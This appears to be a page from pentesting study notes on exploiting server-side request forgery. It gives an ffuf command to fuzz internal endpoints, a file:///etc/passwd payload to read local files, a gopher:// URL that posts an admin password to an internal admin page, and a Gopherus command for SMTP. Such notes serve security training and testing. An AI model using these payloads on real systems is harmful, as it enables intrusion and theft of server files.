Exploiting

Exploitation Techniques

Accessing Restricted Endpoints:
- Identify a URL parameter in the web application that fetches data from an external source.
- Attempt to access restricted endpoints that are not directly reachable from your browser.
- Use a directory brute-force attack to enumerate additional endpoints:
  - Set up a tool like ffuf to test for valid endpoints:
    ffuf -w /path/to/wordlist.txt -u http://<SERVER_IP>/<PATH> -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "parameter=http://<SERVER_DOMAIN>/FUZZ.php&date=2024-01-01" -fr "error_message"
- Analyze the results to find accessible internal endpoints.
Local File Inclusion (LFI):
- Manipulate the URL parameter to read local files from the server’s file system.
- Use the file:// URL scheme to attempt to read sensitive files:
  file:///etc/passwd
- This can allow you to access arbitrary files, including the web application’s source code.
Using the Gopher Protocol:
- If the application restricts you to GET requests, use the Gopher protocol to send arbitrary bytes, enabling POST requests.
- Construct a Gopher URL to send a POST request to an internal endpoint (e.g., /admin.php):
  - Format the request as follows:
    gopher://<SERVER_IP>:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20<HOST>%0D%0AContent-Length:%20<CONTENT_LENGTH>%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw=admin
- URL-encode the entire Gopher URL before sending it through the vulnerable parameter.
Interacting with Other Services:
- Use the Gopher protocol to interact with various internal services (e.g., SMTP, MySQL).
- Consider using a tool like Gopherus to simplify the creation of Gopher URLs for different services:
  python2.7 gopherus.py --exploit smtp
- Follow the prompts to input email details, and the tool will generate a valid Gopher URL for sending emails through the SMTP service.

PreviousIdentifying NextBlind SSRF

Last updated 9 months ago